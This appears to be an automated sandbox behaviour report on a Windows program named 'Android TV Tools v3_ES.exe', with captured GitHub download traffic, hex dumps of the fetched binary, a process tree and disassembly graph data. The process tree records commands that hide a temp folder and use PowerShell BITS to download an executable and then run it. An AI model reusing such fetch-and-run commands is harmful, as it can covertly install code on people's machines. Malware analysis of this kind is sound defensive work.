                      x-ms-creation-time: Wed, 18 Aug 2021 01:46:03 GMT
                      x-ms-lease-status: unlocked
                      x-ms-lease-state: available
                      x-ms-blob-type: BlockBlob
                      Content-Disposition: attachment; filename=cmdmax-x86.exe
                      x-ms-server-encrypted: true
                      Via: 1.1 varnish, 1.1 varnish
                      Accept-Ranges: bytes
                      Age: 2261
                      Date: Sat, 25 May 2024 18:59:04 GMT
                      X-Served-By: cache-iad-kcgs7200171-IAD, cache-ewr18153-EWR
                      X-Cache: HIT, HIT
                      X-Cache-Hits: 164, 0
                      X-Timer: S1716663544.121505,VS0,VE41


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.549709140.82.121.44436360C:\Windows\System32\svchost.exe
                      TimestampBytes transferredDirectionData
                      2024-05-25 18:59:04 UTC234OUTGET /tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      If-Unmodified-Since: Wed, 08 Dec 2021 04:12:16 GMT
                      User-Agent: Microsoft BITS/7.8
                      Host: github.com
                      2024-05-25 18:59:05 UTC997INHTTP/1.1 302 Found
                      Server: GitHub.com
                      Date: Sat, 25 May 2024 18:59:03 GMT
                      Content-Type: text/html; charset=utf-8
                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                      Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/50417431/6e51c424-c3ca-11e5-97ed-aaf014dfa1f3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240525%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240525T185903Z&X-Amz-Expires=300&X-Amz-Signature=fff4a0719c293d9eda64204276fdc932c8a5e83c54ec30c201cfc9b24ace8e09&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=50417431&response-content-disposition=attachment%3B%20filename%3Dcmdmax-x86.exe&response-content-type=application%2Foctet-stream
                      Cache-Control: no-cache
                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                      X-Frame-Options: deny
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 0
                      Referrer-Policy: no-referrer-when-downgrade
                      2024-05-25 18:59:05 UTC3021INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.549710185.199.108.1334436360C:\Windows\System32\svchost.exe
                      TimestampBytes transferredDirectionData
                      2024-05-25 18:59:05 UTC712OUTGET /github-production-release-asset-2e65be/50417431/6e51c424-c3ca-11e5-97ed-aaf014dfa1f3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240525%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240525T185903Z&X-Amz-Expires=300&X-Amz-Signature=fff4a0719c293d9eda64204276fdc932c8a5e83c54ec30c201cfc9b24ace8e09&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=50417431&response-content-disposition=attachment%3B%20filename%3Dcmdmax-x86.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      If-Unmodified-Since: Wed, 08 Dec 2021 04:12:16 GMT
                      User-Agent: Microsoft BITS/7.8
                      Host: objects.githubusercontent.com
                      2024-05-25 18:59:05 UTC813INHTTP/1.1 200 OK
                      Connection: close
                      Content-Length: 27136
                      Content-Type: application/octet-stream
                      Content-MD5: NDSN1VdGjUAa5L+uLoUO7g==
                      Last-Modified: Wed, 08 Dec 2021 04:12:16 GMT
                      ETag: "0x8D9BA00EB94CF21"
                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                      x-ms-request-id: e755e90b-201e-0070-6ff3-8758a2000000
                      x-ms-version: 2020-10-02
                      x-ms-creation-time: Wed, 18 Aug 2021 01:46:03 GMT
                      x-ms-lease-status: unlocked
                      x-ms-lease-state: available
                      x-ms-blob-type: BlockBlob
                      Content-Disposition: attachment; filename=cmdmax-x86.exe
                      x-ms-server-encrypted: true
                      Via: 1.1 varnish, 1.1 varnish
                      Accept-Ranges: bytes
                      Date: Sat, 25 May 2024 18:59:05 GMT
                      Age: 1
                      X-Served-By: cache-iad-kcgs7200171-IAD, cache-nyc-kteb1890083-NYC
                      X-Cache: HIT, HIT
                      X-Cache-Hits: 9, 1
                      X-Timer: S1716663546.843359,VS0,VE28
                      2024-05-25 18:59:05 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 c4 e4 52 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 03 00 00 44 00 00 00 34 00 00 00 00 00 00 70 17 00 00 00 10 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 00 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELRD4p`@
                      2024-05-25 18:59:05 UTC1378INData Raw: 45 e6 0f bf 45 e4 40 66 89 45 fc 66 c7 45 fe b9 0b e9 19 01 00 00 83 7d 08 07 0f 85 fa 00 00 00 6a 0a 6a 00 8b 45 0c 8b 40 04 50 e8 0e 03 00 00 83 c4 0c 66 89 45 ec 6a 0a 6a 00 8b 45 0c 8b 40 08 50 e8 f7 02 00 00 83 c4 0c 66 89 45 ee 66 c7 45 e0 00 00 66 c7 45 e2 00 00 6a 0a 6a 00 8b 45 0c 8b 40 0c 50 e8 d4 02 00 00 83 c4 0c 66 89 45 e4 6a 0a 6a 00 8b 45 0c 8b 40 10 50 e8 bd 02 00 00 83 c4 0c 66 89 45 e6 6a 0a 6a 00 8b 45 0c 8b 40 14 50 e8 a6 02 00 00 83 c4 0c 40 66 89 45 fc 6a 0a 6a 00 8b 45 0c 8b 40 18 50 e8 8e 02 00 00 83 c4 0c 40 66 89 45 fe 0f bf 45 e4 0f bf 4d fc 3b c1 0f 8e 09 00 00 00 0f bf 45 e4 40 66 89 45 fc 0f bf 45 fe 0f bf 4d e6 3b c1 0f 8d 09 00 00 00 0f bf 45 e6 40 66 89 45 fe 8b 45 0c 8b 40 04 0f be 00 83 f8 6e 0f 85 19 00 00 00 8b 45 0c
                      Data Ascii: EE@fEfE}jjE@PfEjjE@PfEfEfEjjE@PfEjjE@PfEjjE@P@fEjjE@P@fEEM;E@fEEM;E@fEE@nE
                      2024-05-25 18:59:05 UTC1378INData Raw: 00 00 00 80 eb 05 bf ff ff ff 7f 8b 4c 24 1c 85 c9 74 02 89 31 f7 c5 02 00 00 00 74 02 f7 df 8b c7 5d 5f 5e 5b 83 c4 04 c3 8b 4c 24 1c 85 c9 74 06 8b 44 24 18 89 01 33 c0 5d 5f 5e 5b 83 c4 04 c3 cc cc cc cc cc cc cc cc cc cc cc 8b 54 24 0c 8b 4c 24 04 85 d2 74 47 33 c0 8a 44 24 08 57 8b f9 83 fa 04 72 2d f7 d9 83 e1 03 74 08 2b d1 88 07 47 49 75 fa 8b c8 c1 e0 08 03 c1 8b c8 c1 e0 10 03 c1 8b ca 83 e2 03 c1 e9 02 74 06 f3 ab 85 d2 74 06 88 07 47 4a 75 fa 8b 44 24 08 5f c3 8b 44 24 04 c3 cc cc cc cc cc cc cc cc 64 a1 00 00 00 00 55 8b ec 6a ff 68 00 60 40 00 68 90 36 40 00 50 64 89 25 00 00 00 00 83 ec 10 53 56 57 89 65 e8 ff 15 34 a1 40 00 33 d2 8b c8 8a d4 81 e1 ff 00 00 00 c1 e8 10 89 15 94 75 40 00 89 0d 90 75 40 00 a3 88 75 40 00 c1 e1 08 03 ca 89 0d
                      Data Ascii: L$t1t]_^[L$tD$3]_^[T$L$tG3D$Wr-t+GIuttGJuD$_D$dUjh`@h6@Pd%SVWe4@3u@u@u@
                      2024-05-25 18:59:05 UTC1378INData Raw: 8d 44 24 28 8b 8c 24 5c 02 00 00 0f be d3 50 51 52 e8 a4 07 00 00 83 c4 0c 8b 84 24 60 02 00 00 ff 84 24 60 02 00 00 8a 18 84 db 0f 85 e3 fd ff ff 8b 44 24 28 5d 5f 5e 5b 81 c4 48 02 00 00 c3 83 ce 20 eb d4 83 ce 10 eb cf 81 ce 00 08 00 00 eb c7 0f be cb 83 e9 43 83 f9 35 0f 87 ed 04 00 00 33 c0 8a 81 a4 23 40 00 ff 24 85 60 23 40 00 f7 c6 30 08 00 00 75 06 81 ce 00 08 00 00 f7 c6 10 08 00 00 8d 84 24 64 02 00 00 50 0f 84 75 04 00 00 e8 23 08 00 00 83 c4 04 50 8d 44 24 5c 50 e8 45 20 00 00 83 c4 08 8b f8 85 ff 0f 8d 66 04 00 00 c7 44 24 48 01 00 00 00 e9 59 04 00 00 c7 44 24 4c 01 00 00 00 80 c3 20 83 ce 40 8d 44 24 58 83 7c 24 1c 00 89 44 24 18 0f 8d 78 03 00 00 c7 44 24 1c 06 00 00 00 e9 7a 03 00 00 f7 c6 30 08 00 00 75 06 81 ce 00 08 00 00 83 7c 24 1c
                      Data Ascii: D$($\PQR$`$`D$(]_^[H C53#@$`#@0u$dPu#PD$\PE fD$HYD$L @D$X|$D$xD$z0u|$
                      2024-05-25 18:59:05 UTC1378INData Raw: c6 00 01 00 00 74 07 c6 44 24 12 2d eb 1c f7 c6 01 00 00 00 74 07 c6 44 24 12 2b eb 0d f7 c6 02 00 00 00 74 0d c6 44 24 12 20 c7 44 24 38 01 00 00 00 8b 44 24 34 2b c7 2b 44 24 38 f7 c6 0c 00 00 00 89 44 24 20 75 1c 8d 44 24 28 8b 8c 24 5c 02 00 00 8b 54 24 20 50 51 52 6a 20 e8 47 02 00 00 83 c4 10 8d 44 24 28 8b 8c 24 5c 02 00 00 8b 54 24 38 50 8d 44 24 16 51 52 50 e8 68 02 00 00 83 c4 10 f7 c6 08 00 00 00 74 24 f7 c6 04 00 00 00 75 1c 8d 44 24 28 8b 8c 24 5c 02 00 00 8b 54 24 20 50 51 52 6a 30 e8 fc 01 00 00 83 c4 10 83 7c 24 3c 00 74 49 85 ff 7e 45 8b 6c 24 18 8d 5f ff 8b c5 8d 4c 24 14 66 8b 00 83 c5 02 50 51 e8 b4 1a 00 00 83 c4 08 85 c0 7e 3f 8d 4c 24 28 8b 94 24 5c 02 00 00 51 52 50 8d 44 24 20 50 e8 f5 01 00 00 83 c4 10 8b cb 4b 85 c9 75 c4 eb 1b
                      Data Ascii: tD$-tD$+tD$ D$8D$4++D$8D$ uD$($\T$ PQRj GD$($\T$8PD$QRPht$uD$($\T$ PQRj0|$<tI~El$_L$fPQ~?L$($\QRPD$ PKu
                      2024-05-25 18:59:05 UTC1378INData Raw: 40 00 51 8b 4c 24 14 51 6a 01 50 e8 46 1a 00 00 83 c4 1c 85 c0 75 06 b8 ff ff ff 7f c3 83 e8 02 c3 cc cc cc cc cc a1 74 82 40 00 85 c0 74 02 ff d0 68 10 70 40 00 68 08 70 40 00 e8 d6 00 00 00 83 c4 08 68 04 70 40 00 68 00 70 40 00 e8 c4 00 00 00 83 c4 08 c3 8b 44 24 04 6a 00 6a 00 50 e8 32 00 00 00 83 c4 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 6a 00 6a 01 50 e8 12 00 00 00 83 c4 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 05 c0 75 40 00 01 00 00 00 83 7c 24 08 00 53 56 8b 5c 24 14 88 1d bc 75 40 00 75 3f 83 3d 78 82 40 00 00 74 24 8b 35 70 82 40 00 83 ee 04 3b 35 78 82 40 00 72 13 8b 06 85 c0 74 02 ff d0 83 ee 04 3b 35 78 82 40 00 73 ed 68 1c 70 40 00 68 14 70 40 00 e8 27 00 00 00 83 c4 08 68 24 70 40 00 68 20 70 40 00 e8 15 00
                      Data Ascii: @QL$QjPFut@thp@hp@hp@hp@D$jjP2D$jjPu@|$SV\$u@u?=x@t$5p@;5x@rt;5x@shp@hp@'h$p@h p@
                      2024-05-25 18:59:05 UTC1378INData Raw: 00 00 a1 74 78 40 00 50 6a 08 ff d2 83 c4 08 89 3d 74 78 40 00 eb 10 c7 40 08 00 00 00 00 8b 40 04 50 ff d2 83 c4 04 b8 ff ff ff ff 5f 89 35 78 78 40 00 5e c3 8b 4c 24 10 51 ff 15 40 a1 40 00 5f 5e c3 cc ba f0 77 40 00 8b 4c 24 04 39 0a 74 16 83 c2 0c a1 70 78 40 00 8d 04 40 8d 04 85 f0 77 40 00 3b c2 77 e6 8b 02 2b c1 83 f8 01 1b c0 23 c2 c3 cc 83 ec 04 8b 15 b8 72 40 00 53 56 57 33 f6 55 80 3a 00 74 1a 80 3a 3d 74 01 46 8b fa b9 ff ff ff ff 2b c0 f2 ae f7 d1 03 d1 80 3a 00 75 e6 8d 04 b5 04 00 00 00 50 e8 a5 11 00 00 a3 a4 75 40 00 83 c4 04 8b d8 85 db 75 0a 6a 09 e8 70 eb ff ff 83 c4 04 8b 2d b8 72 40 00 8b c5 80 7d 00 00 74 5e 8b fd b9 ff ff ff ff 2b c0 f2 ae f7 d1 89 4c 24 10 80 7d 00 3d 74 3d 51 e8 62 11 00 00 83 c4 04 89 03 85 c0 75 0a 6a 09 e8 32
                      Data Ascii: tx@Pj=tx@@@P_5xx@^L$Q@@_^w@L$9tpx@@w@;w+#r@SVW3U:t:=tF+:uPu@ujp-r@}t^+L$}=t=Qbuj2
                      2024-05-25 18:59:05 UTC1378INData Raw: c4 04 c3 33 c0 5d 5f 5e 5b 83 c4 04 c3 cc cc cc cc cc 8b 44 24 04 83 ec 18 53 56 57 55 50 e8 cf 01 00 00 83 c4 04 8b e8 39 2d 8c 79 40 00 75 0a 33 c0 5d 5f 5e 5b 83 c4 18 c3 85 ed 75 0f e8 5f 02 00 00 33 c0 5d 5f 5e 5b 83 c4 18 c3 c7 44 24 10 00 00 00 00 b8 b0 79 40 00 39 28 0f 84 9b 00 00 00 83 c0 30 ff 44 24 10 3d a0 7a 40 00 72 ea 8d 44 24 14 50 55 ff 15 5c a1 40 00 83 f8 01 0f 85 43 01 00 00 bf 88 78 40 00 33 c0 b9 40 00 00 00 f3 ab aa 83 7c 24 14 01 0f 86 06 01 00 00 8d 74 24 1a 38 44 24 1a 74 2c 8a 4e 01 84 c9 74 25 33 c0 33 d2 8a 06 8a d1 3b d0 72 11 80 88 89 78 40 00 04 40 33 c9 8a 4e 01 3b c8 73 ef 83 c6 02 80 3e 00 75 d4 b8 01 00 00 00 80 88 89 78 40 00 08 40 3d ff 00 00 00 72 f1 55 89 2d 8c 79 40 00 e8 4d 01 00 00 83 c4 04 e9 af 00 00 00 bf 88
                      Data Ascii: 3]_^[D$SVWUP9-y@u3]_^[u_3]_^[D$y@9(0D$=z@rD$PU\@Cx@3@|$t$8D$t,Nt%33;rx@@3N;s>ux@@=rU-y@M
                      2024-05-25 18:59:05 UTC1378INData Raw: 89 43 0c ff 54 8f 08 8b 7b 08 8d 0c 76 8b 34 8f eb a1 b8 00 00 00 00 eb 1c b8 01 00 00 00 eb 15 55 8d 6b 10 6a ff 53 e8 3a f3 ff ff 83 c4 08 5d b8 01 00 00 00 5d 5f 5e 5b 8b e5 5d c3 55 8b 4c 24 08 8b 29 8b 41 1c 50 8b 41 18 50 e8 15 f3 ff ff 83 c4 08 5d c2 04 00 cc cc cc cc cc cc cc cc a1 c4 72 40 00 83 f8 01 74 0d 85 c0 75 2e 83 3d c8 72 40 00 01 75 25 68 fc 00 00 00 e8 1f 00 00 00 83 c4 04 a1 98 7d 40 00 85 c0 74 02 ff d0 68 ff 00 00 00 e8 07 00 00 00 83 c4 04 c3 cc cc cc 81 ec a8 01 00 00 33 c0 b9 10 7d 40 00 53 8b 94 24 b0 01 00 00 56 57 55 39 11 74 0c 83 c1 08 40 81 f9 98 7d 40 00 72 f0 39 14 c5 10 7d 40 00 8d 1c c5 00 00 00 00 0f 85 a7 01 00 00 83 3d c4 72 40 00 01 0f 84 5f 01 00 00 83 3d c4 72 40 00 00 75 0d 83 3d c8 72 40 00 01 0f 84 49 01 00 00
                      Data Ascii: CT{v4UkjS:]]_^[]UL$)APAP]r@tu.=r@u%h}@th3}@S$VWU9t@}@r9}@=r@_=r@u=r@I
                      2024-05-25 18:59:05 UTC1378INData Raw: ff ff 5f c7 05 7c 75 40 00 09 00 00 00 c7 05 80 75 40 00 00 00 00 00 5e 5b c3 cc cc cc cc 56 ff 05 78 75 40 00 8b 74 24 08 68 00 10 00 00 e8 fb 01 00 00 83 c4 04 89 46 08 85 c0 74 0d 83 4e 0c 08 c7 46 18 00 10 00 00 eb 11 83 4e 0c 04 8d 46 14 89 46 08 c7 46 18 02 00 00 00 8b 46 08 89 06 c7 46 04 00 00 00 00 5e c3 cc cc cc cc cc 8b 54 24 04 39 15 68 81 40 00 77 03 33 c0 c3 8b c2 83 e2 1f 83 e0 e7 c1 f8 03 8b 88 70 81 40 00 33 c0 8a 44 d1 04 83 e0 40 c3 cc cc cc cc cc cc 8b 4c 24 04 83 ec 04 85 c9 75 06 33 c0 83 c4 04 c3 83 3d 38 7e 40 00 00 75 2b 66 81 7c 24 0c ff 00 76 13 b8 ff ff ff ff 83 c4 04 c7 05 7c 75 40 00 2a 00 00 00 c3 8a 44 24 0c 88 01 b8 01 00 00 00 83 c4 04 c3 8d 44 24 00 8b 15 d4 77 40 00 c7 44 24 00 00 00 00 00 50 6a 00 52 a1 48 7e 40 00 51
                      Data Ascii: _|u@u@^[Vxu@t$hFtNFNFFFFF^T$9h@w3p@3D@L$u3=8~@u+f|$v|u@*D$D$w@D$PjRH~@Q


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Users\user\Desktop\Android TV Tools v3_ES.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Android TV Tools v3_ES.exe"
                      Imagebase:0x400000
                      File size:389'816 bytes
                      MD5 hash:66773F373DE9E1AA11B3F2E6F74967AF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:1
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:2
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\ytmp" mkdir "C:\Users\user\AppData\Local\Temp\ytmp"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmp
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\attrib.exe
                      Wow64 process (32bit):true
                      Commandline:attrib +h C:\Users\user\AppData\Local\Temp\ytmp
                      Imagebase:0xda0000
                      File size:19'456 bytes
                      MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:7
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:14:58:55
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:9
                      Start time:14:58:55
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:10
                      Start time:14:58:55
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\PING.EXE
                      Wow64 process (32bit):true
                      Commandline:ping google.com -n 1
                      Imagebase:0x760000
                      File size:18'944 bytes
                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:11
                      Start time:14:58:55
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'"
                      Imagebase:0xa80000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:12
                      Start time:14:58:56
                      Start date:25/05/2024
                      Path:C:\Windows\System32\svchost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Imagebase:0x7ff7e52b0000
                      File size:55'320 bytes
                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:14
                      Start time:14:59:05
                      Start date:25/05/2024
                      Path:C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe
                      Wow64 process (32bit):true
                      Commandline:"Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999
                      Imagebase:0x400000
                      File size:27'136 bytes
                      MD5 hash:34348DD557468D401AE4BFAE2E850EEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:21.7%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:2.6%
                        Total number of Nodes:1368
                        Total number of Limit Nodes:25
                        execution_graph 7497 40a740 7498 40a747 7497->7498 7499 40a74f MultiByteToWideChar 7498->7499 7500 40a778 7498->7500 7499->7500 7501 40a768 GetStringTypeW 7499->7501 7501->7500 6492 406444 GetVersion 6513 40893c HeapCreate 6492->6513 6494 4064a2 6495 4064a7 6494->6495 6496 4064af 6494->6496 6628 406548 6495->6628 6520 4075bc 6496->6520 6500 4064b8 GetCommandLineA 6534 40880a 6500->6534 6504 4064d2 6566 408504 6504->6566 6506 4064d7 6579 401000 6506->6579 6514 408971 6513->6514 6515 40895c 6513->6515 6514->6494 6641 409815 HeapAlloc 6515->6641 6518 408974 6518->6494 6519 408965 HeapDestroy 6519->6514 6643 408da8 6520->6643 6523 4075db GetStartupInfoA 6526 407627 6523->6526 6527 4076ec 6523->6527 6526->6527 6530 408da8 6 API calls 6526->6530 6533 407698 6526->6533 6528 407753 SetHandleCount 6527->6528 6529 407713 GetStdHandle 6527->6529 6528->6500 6529->6527 6531 407721 GetFileType 6529->6531 6530->6526 6531->6527 6532 4076ba GetFileType 6532->6533 6533->6527 6533->6532 6535 408825 GetEnvironmentStringsW 6534->6535 6536 408858 6534->6536 6537 40882d 6535->6537 6539 408839 GetEnvironmentStrings 6535->6539 6536->6537 6538 408849 6536->6538 6541 408871 WideCharToMultiByte 6537->6541 6542 408865 GetEnvironmentStringsW 6537->6542 6540 4064c8 6538->6540 6543 4088f7 6538->6543 6544 4088eb GetEnvironmentStrings 6538->6544 6539->6538 6539->6540 6557 4085bd 6540->6557 6546 4088a5 6541->6546 6547 4088d7 FreeEnvironmentStringsW 6541->6547 6542->6540 6542->6541 6548 408da8 6 API calls 6543->6548 6544->6540 6544->6543 6549 408da8 6 API calls 6546->6549 6547->6540 6555 408912 6548->6555 6550 4088ab 6549->6550 6550->6547 6551 4088b4 WideCharToMultiByte 6550->6551 6553 4088ce 6551->6553 6554 4088c5 6551->6554 6552 408928 FreeEnvironmentStringsA 6552->6540 6553->6547 6701 407308 6554->6701 6555->6552 6558 4085d4 GetModuleFileNameA 6557->6558 6559 4085cf 6557->6559 6561 4085f7 6558->6561 6714 40b625 6559->6714 6562 408da8 6 API calls 6561->6562 6563 408618 6562->6563 6564 408628 6563->6564 6565 406523 7 API calls 6563->6565 6564->6504 6565->6564 6567 408511 6566->6567 6569 408516 6566->6569 6568 40b625 19 API calls 6567->6568 6568->6569 6570 408da8 6 API calls 6569->6570 6571 408543 6570->6571 6572 406523 7 API calls 6571->6572 6576 408557 6571->6576 6572->6576 6573 40859a 6574 407308 4 API calls 6573->6574 6575 4085a6 6574->6575 6575->6506 6576->6573 6577 408da8 6 API calls 6576->6577 6578 406523 7 API calls 6576->6578 6577->6576 6578->6576 6580 40100d 6579->6580 6768 404d37 6580->6768 6582 